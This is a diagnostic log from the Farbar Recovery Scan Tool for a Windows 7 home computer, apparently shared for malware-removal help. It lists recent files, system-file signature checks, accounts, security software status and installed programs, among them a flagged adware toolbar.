R3 tmnciesc; C:\Windows\System32\DRIVERS\tmnciesc.sys [561952 2016-06-24] (Trend Micro Inc.)
R1 tmumh; C:\Windows\System32\DRIVERS\TMUMH.sys [101088 2016-08-09] (Trend Micro Inc.)
R2 tmusa; C:\Windows\System32\DRIVERS\tmusa.sys [124752 2015-12-09] (Trend Micro Inc.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-01 14:41 - 2016-12-01 14:42 - 00022344 _____ C:\Users\Owner\Desktop\FRST.txt
2016-12-01 14:18 - 2016-12-01 14:18 - 00000000 ____D C:\Users\Owner\Desktop\Old Firefox Data
2016-11-30 15:09 - 2016-11-30 15:09 - 00000000 ____D C:\Users\Owner\Desktop\FRST-OlderVersion
2016-11-29 23:58 - 2016-11-29 23:58 - 00000017 _____ C:\Windows\SysWOW64\shortcut_ex.dat
2016-11-29 18:06 - 2016-12-01 14:41 - 00000000 ____D C:\FRST
2016-11-29 18:02 - 2016-11-30 15:09 - 02411520 _____ (Farbar) C:\Users\Owner\Desktop\FRST64.exe
2016-11-28 14:52 - 2016-11-28 15:10 - 00002216 _____ C:\Users\Owner\Desktop\Play The Chronicles of Emerland Solitaire.lnk
2016-11-26 22:32 - 2016-12-01 14:36 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Mozilla
2016-11-26 21:50 - 2016-12-01 14:18 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-11-26 19:46 - 2016-11-29 18:26 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-11-26 19:45 - 2016-11-26 19:45 - 00001066 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-11-26 19:45 - 2016-11-26 19:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-11-26 19:45 - 2016-11-26 19:45 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-11-26 19:45 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-11-26 19:45 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-11-26 19:45 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-11-26 14:36 - 2016-11-26 14:45 - 00000000 ____D C:\KVRT_Data
2016-11-26 14:36 - 2016-11-26 14:36 - 00478392 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\31DADE60.sys
2016-11-26 14:00 - 2016-11-26 14:00 - 00000000 ____D C:\Users\Owner\AppData\Local\CEF
2016-11-26 13:52 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Software Updater Beta
2016-11-26 13:52 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Security Scan
2016-11-26 13:52 - 2016-11-26 13:51 - 00001015 _____ C:\Users\Public\Desktop\Kaspersky Security Scan.lnk
2016-11-26 13:51 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Kaspersky Lab
2016-11-26 13:51 - 2016-11-26 13:52 - 00000000 ____D C:\Program Files (x86)\Kaspersky Lab
2016-11-26 13:49 - 2016-11-26 13:50 - 00000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2016-11-26 13:48 - 2016-11-26 13:48 - 02622304 _____ (Kaspersky Lab) C:\Users\Owner\Downloads\kss16.0.0.1344en_9702.exe
2016-11-26 13:45 - 2016-11-26 13:49 - 00211378 _____ C:\TDSSKiller.3.1.0.12_26.11.2016_13.45.18_log.txt
2016-11-26 13:44 - 2016-11-26 13:45 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Owner\Downloads\tdsskiller.exe
2016-11-26 13:27 - 2016-11-26 13:39 - 22851472 _____ (Malwarebytes ) C:\Users\Owner\Downloads\mbam-setup-2.2.1.1043.exe
2016-11-26 13:10 - 2016-11-26 13:10 - 00000000 ____D C:\Users\Owner\AppData\Local\HP_Development_Company,_L
2016-11-26 13:03 - 2016-11-26 13:03 - 00002231 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-26 13:03 - 2016-11-26 13:03 - 00002219 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-11-26 13:02 - 2016-12-01 14:31 - 00000892 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-11-26 13:02 - 2016-12-01 14:07 - 00000896 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-11-26 13:02 - 2016-11-26 13:53 - 00000000 ____D C:\Users\Owner\AppData\Local\Google
2016-11-26 13:02 - 2016-11-26 13:03 - 00000000 ____D C:\Program Files (x86)\Google
2016-11-26 13:02 - 2016-11-26 13:02 - 00003892 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-11-26 13:02 - 2016-11-26 13:02 - 00003640 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-11-26 13:00 - 2016-11-26 13:00 - 01065376 _____ (Google Inc.) C:\Users\Owner\Downloads\ChromeSetup.exe
2016-11-25 18:38 - 2016-11-25 18:38 - 00000000 ____D C:\ProgramData\HP Inc
2016-11-13 01:25 - 2016-11-13 01:56 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
2016-11-13 01:25 - 2016-11-13 01:26 - 00001303 _____ C:\Users\Owner\Desktop\Norton Installation Files.lnk
2016-11-13 01:25 - 2016-11-13 01:25 - 00000000 ____D C:\Users\Public\Downloads\Norton

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-01 14:34 - 2016-10-21 23:38 - 00000000 ____D C:\Users\Owner\AppData\Local\DP_Tower_3.7
2016-12-01 14:30 - 2013-07-16 13:50 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-12-01 14:30 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-12-01 14:19 - 2009-07-13 23:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-12-01 14:19 - 2009-07-13 23:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-12-01 09:53 - 2012-09-08 13:26 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-12-01 09:01 - 2012-05-15 19:44 - 00000000 ____D C:\Users\Owner\AppData\Roaming\HpUpdate
2016-12-01 04:28 - 2010-10-22 23:19 - 00000000 ____D C:\Users\Owner\AppData\Roaming\SoftGrid Client
2016-11-30 19:10 - 2016-10-22 00:10 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForOwner
2016-11-30 19:10 - 2016-10-22 00:10 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForOwner.job
2016-11-30 15:49 - 2013-05-25 16:08 - 00000000 ____D C:\Users\Owner\Desktop\Ginny's Folder
2016-11-30 15:18 - 2010-07-10 22:10 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-11-30 15:03 - 2009-07-14 00:32 - 00000000 ____D C:\Windows\Downloaded Program Files
2016-11-30 14:58 - 2013-07-27 22:55 - 00003356 _____ C:\Windows\System32\Tasks\RunAsStdUser Task
2016-11-30 14:58 - 2013-07-27 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pogo Games
2016-11-30 14:55 - 2013-06-07 21:03 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Temp
2016-11-30 11:05 - 2016-02-22 09:53 - 00000010 _____ C:\Users\Owner\AppData\Local\sponge.last.runtime.cache
2016-11-29 20:54 - 2016-10-23 15:30 - 00000000 ____D C:\Users\Owner\AppData\Roaming\21084ad9
2016-11-29 20:51 - 2016-10-23 15:30 - 00000000 ____D C:\Users\Owner\AppData\Local\767c1f6b
2016-11-29 20:51 - 2010-07-10 22:12 - 00000000 ____D C:\Windows\PCHEALTH
2016-11-29 01:43 - 2013-05-25 16:09 - 00000000 ____D C:\Users\Owner\Desktop\Ginny's Recipes
2016-11-28 22:59 - 2009-07-14 00:13 - 00783464 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-28 22:59 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-11-28 15:10 - 2013-08-02 21:08 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games
2016-11-28 14:52 - 2013-06-07 21:05 - 00000000 ____D C:\Remote Programs
2016-11-26 20:32 - 2015-10-21 19:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-11-26 20:32 - 2010-07-11 00:29 - 00000000 ____D C:\Program Files\Java
2016-11-26 20:30 - 2015-10-21 19:55 - 00110144 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2016-11-26 20:27 - 2013-08-18 12:38 - 00000000 ____D C:\Program Files (x86)\Java
2016-11-26 20:14 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\TAPI
2016-11-26 19:45 - 2013-07-16 14:09 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-11-26 04:58 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\Help
2016-11-26 04:48 - 2009-07-13 23:45 - 00326960 _____ C:\Windows\system32\FNTCACHE.DAT
2016-11-25 18:37 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF
2016-11-25 18:36 - 2010-10-21 17:26 - 00080416 _____ C:\Users\Owner\AppData\Local\GDIPFONTCACHEV1.DAT
2016-11-25 18:36 - 2010-07-10 22:09 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2016-11-25 18:29 - 2010-07-10 23:08 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2016-11-25 18:18 - 2010-10-21 17:28 - 00000000 ____D C:\Users\Owner\AppData\Roaming\hpqLog
2016-11-25 18:06 - 2012-05-15 19:43 - 00000000 ____D C:\Program Files (x86)\HP
2016-11-25 16:41 - 2009-09-06 19:40 - 00000000 ____D C:\SwSetup
2016-11-24 04:13 - 2010-07-10 23:08 - 00000000 ____D C:\ProgramData\Temp
2016-11-13 01:56 - 2010-09-28 03:51 - 00000000 ____D C:\ProgramData\Norton
2016-11-12 23:53 - 2012-09-08 13:26 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-11-12 23:53 - 2012-09-08 13:26 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-11-12 23:53 - 2012-02-20 15:56 - 00000000 ____D C:\Windows\system32\Macromed
2016-11-12 23:53 - 2011-06-15 18:31 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-11-12 23:53 - 2010-07-10 22:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed

==================== Files in the root of some directories =======

2013-12-25 01:41 - 2016-05-08 13:39 - 0000458 _____ () C:\Users\Owner\AppData\Roaming\wklnhst.dat
2016-02-22 09:53 - 2016-11-30 11:05 - 0000010 _____ () C:\Users\Owner\AppData\Local\sponge.last.runtime.cache
2012-05-15 19:41 - 2012-05-15 19:41 - 0000057 _____ () C:\ProgramData\Ament.ini
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2010-07-10 23:57 - 2010-07-10 23:57 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2010-07-10 23:51 - 2010-07-10 23:52 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2010-09-28 03:44 - 2010-09-28 03:44 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2010-07-10 23:50 - 2010-07-10 23:51 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2010-07-10 23:52 - 2010-07-10 23:56 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2010-09-28 03:45 - 2010-09-28 03:46 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-23 17:36

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-11-2016
Ran by Owner (01-12-2016 14:43:19)
Running from C:\Users\Owner\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-10-21 21:54:18)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2406275642-2542123288-3132197554-500 - Administrator - Disabled)
Guest (S-1-5-21-2406275642-2542123288-3132197554-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2406275642-2542123288-3132197554-1002 - Limited - Enabled)
Owner (S-1-5-21-2406275642-2542123288-3132197554-1000 - Administrator - Enabled) => C:\Users\Owner

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Disabled - Up to date) {8242D66F-41BD-4049-C2E6-E578E73B62A0}
AS: Trend Micro Internet Security (Disabled - Up to date) {3923378B-6787-4FC7-F856-DE0A9CBC281D}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

5 Card Slingo Deluxe (HKLM-x32\...\5 Card Slingo Deluxe) (Version: 1.0.9 - funkitron)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\{9ECF7817-DB11-4FBA-9DF1-296A578D513A}) (Version: 11.5.7.609 - Adobe Systems, Inc)
Aquascapes (HKLM-x32\...\54e64742d7c097e9a547ec51ec3e33c2) (Version:  - GameHouse)
Aquascapes (HKLM-x32\...\BFG-Aquascapes) (Version:  - )
Aquascapes Collector's Edition (HKLM-x32\...\Aquascapes Collector's Edition_is1) (Version: 1.0 - Playrix Entertainment)
Aquascapes Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 9.2 - Atheros)
ATI Catalyst Install Manager (HKLM\...\{ECD0D4B5-FFA9-6E1B-A08D-58E82EA5EEB9}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Barn Yarn Collector's Edition (HKLM-x32\...\Barn Yarn Collector's Edition_is1) (Version: 1.0 - Playrix Entertainment)
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Big Fish Games: Game Manager (HKLM-x32\...\BFGC) (Version: 3.0.1.60 - )
Bing Bar (HKLM-x32\...\{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}) (Version: 7.0.609.0 - Microsoft Corporation)
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Build-a-lot 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bumper Deluxe (HKLM-x32\...\Bumper Deluxe) (Version:  - funkitron)
ccc-core-static (x32 Version: 2010.0617.855.14122 - ATI) Hidden
Chainz 2 Relinked (HKLM-x32\...\exent_663050) (Version:  - )
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
CinemaNow Media Manager (HKLM-x32\...\{6C122441-1861-4CD7-B1C5-A163A6984E12}) (Version: 1.9.1.105 - CinemaNow, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Clutter II - He Said, She Said (HKLM-x32\...\310fe0ed83e67ea82706269a05741425) (Version:  - )
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
CyberLink DVD Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.3003 - CyberLink Corp.)
CyberLink MediaShow (HKLM-x32\...\InstallShield_{80E158EA-7181-40FE-A701-301CE6BE64AB}) (Version: 5.0.1616 - CyberLink Corp.)
CyberLink PowerDVD 9 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.0.1.4217 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.0.2511 - CyberLink Corp.)
Delicious - Emily's Wonder Wedding Premium Edition (HKLM-x32\...\65a10d0b2572fd789018429552e72c01) (Version:  - )
Diner Dash 2 Restaurant Rescue (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dora's Carnival Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Energy Star Digital Logo (HKLM-x32\...\{BD1A34C9-4764-4F79-AE1F-112F8C89D3D4}) (Version: 1.0.1 - Hewlett-Packard)
Escape Rosecliff Island (x32 Version: 2.2.0.95 - WildTangent) Hidden
ESU for Microsoft Windows 7 (HKLM-x32\...\{3877C901-7B90-4727-A639-B6ED2DD59D43}) (Version: 1.0.0 - Hewlett-Packard)
FATE (x32 Version: 2.2.0.95 - WildTangent) Hidden
Final Drive Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Finding Hope (HKLM-x32\...\d21f1d9cc71efcf517e3da1e18d36787) (Version:  - GameHouse)
Fishdom (remove only) (HKLM-x32\...\Fishdom) (Version:  - )
Fishdom 3 (HKLM-x32\...\f787ff3ddadc8b46619e8324fac303ec) (Version:  - )
Fishdom H2O - Hidden Odyssey™ (remove only) (HKLM-x32\...\Fishdom H2O - Hidden Odyssey™) (Version:  - )
Fishdom™ 2 (HKLM-x32\...\22c5079ca968caf972807e4c92a273cc) (Version:  - )
Five Card Frenzy (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7}) (Version:  - Oberon Media)
GamesBar 1.1.0.5 (HKLM-x32\...\GamesBar) (Version:  - Oberon Media, Inc.)
Gardenscapes (HKLM-x32\...\Gardenscapes_is1) (Version: 1.0 - Playrix Entertainment)
Gold Miner Vegas (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113644907}) (Version:  - Oberon Media)
Gold Miner Vegas (HKLM-x32\...\BFG-Gold Miner Vegas) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Heroes of Hellas 2 - Olympia (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hidden Object Crosswords (HKLM-x32\...\27054fe294c730c6d79be8b9c312346e) (Version:  - )
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.4.10262.3295 - Hewlett-Packard)
HP Documentation (HKLM-x32\...\{5E25081D-9CB4-4B17-AD2B-8DF2DC335E85}) (Version: 1.1.1.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP MediaSmart CinemaNow 2.0 (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.3611 - HP Photo Creations Powered by RocketLife)
HP Photosmart 7510 series Basic Device Software (HKLM\...\{0446B95B-C0FD-4DE9-BD8E-76015D05E4F3}) (Version: 25.0.617.0 - Hewlett-Packard Co.)
HP Photosmart 7510 series Help (HKLM-x32\...\{6357D25F-A9C9-4CC7-A1FB-0DCF344E7C40}) (Version: 140.0.2.2 - Hewlett Packard)
HP Photosmart 7510 series Product Improvement Study (HKLM\...\{D9F55AA1-FD3E-47FF-A385-72ED53666D3F}) (Version: 25.0.617.0 - Hewlett-Packard Co.)
HP Power Manager (HKLM-x32\...\{4B156358-CE9C-4E9F-8CAD-79AE86A68C60}) (Version: 1.0.3 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{EB58480C-0721-483C-B354-9D35A147999F}) (Version: 2.3.6 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{72D90DB3-A16A-4545-B555-868471101833}) (Version: 8.1.4186.3400 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{97174E88-52F9-445A-A28E-704A45332D19}) (Version: 4.0.108.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{56D27851-B9A6-430F-875A-E2D7A3802C7B}) (Version: 8.3.34.7 - HP Inc.)
HP Support Solutions Framework (HKLM-x32\...\{E7F7C2F3-0BEF-471A-A6F3-4B43002034F4}) (Version: 12.5.32.37 - HP Inc.)
HP Update (HKLM-x32\...\{85DF2EED-08BC-46FB-90DA-28B0D0A8E8A8}) (Version: 5.003.000.004 - Hewlett-Packard)
HP Wireless Assistant (HKLM\...\{B5FC1E1B-E70D-45F1-8E40-A3C30698B323}) (Version: 4.0.9.0 - Hewlett-Packard Company)
Insaniquarium Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Internet Explorer Toolbar 4.8 by SweetPacks (HKLM-x32\...\{DD85D6BF-4787-4A93-99A5-3F0CF0AE8834}) (Version: 4.8.0000 - SweetIM Technologies Ltd.) <==== ATTENTION
Java 8 Update 111 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation)
Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Jewel Quest (remove only) (HKLM-x32\...\Jewel Quest) (Version:  - )
Jewel Quest 3 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest Solitaire 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Jewel Quest Solitaire III (remove only) (HKLM-x32\...\Jewel Quest Solitaire III) (Version:  - )
Junk Mail filter update (x32 Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Kaspersky Security Scan (HKLM-x32\...\InstallWIX_{D1282694-0693-41A8-ABC1-6D1FFC1F65C5}) (Version: 16.0.0.1344 - Kaspersky Lab)
Kaspersky Security Scan (x32 Version: 16.0.0.1344 - Kaspersky Lab) Hidden
Kaspersky Software Updater Beta (HKLM-x32\...\InstallWIX_{94C8D443-1D07-4E6D-A9EB-FDBA45A839D8}) (Version: 1.5.2.228 - Kaspersky Lab)
Kaspersky Software Updater Beta (x32 Version: 1.5.2.228 - Kaspersky Lab) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2907 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.2907 - CyberLink Corp.) Hidden
Letters from Nowhere Double Pack (HKLM-x32\...\5c5210d7d541dcde7bbbf44a769244f7) (Version:  - )
Lottso Deluxe (HKLM-x32\...\exent_696450) (Version:  - )
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft IntelliPoint 8.0 (HKLM\...\{563F041C-DFDB-437B-A1E8-E141E0906076}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Word 2002 (HKLM-x32\...\{911B0409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.6626.0 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{B9966F27-9678-4620-9579-925E3084647E}) (Version: 07.03.0719 - Microsoft Corporation)
Microsoft Works 2004 Setup Launcher (HKLM-x32\...\Works2004Setup) (Version:  - )
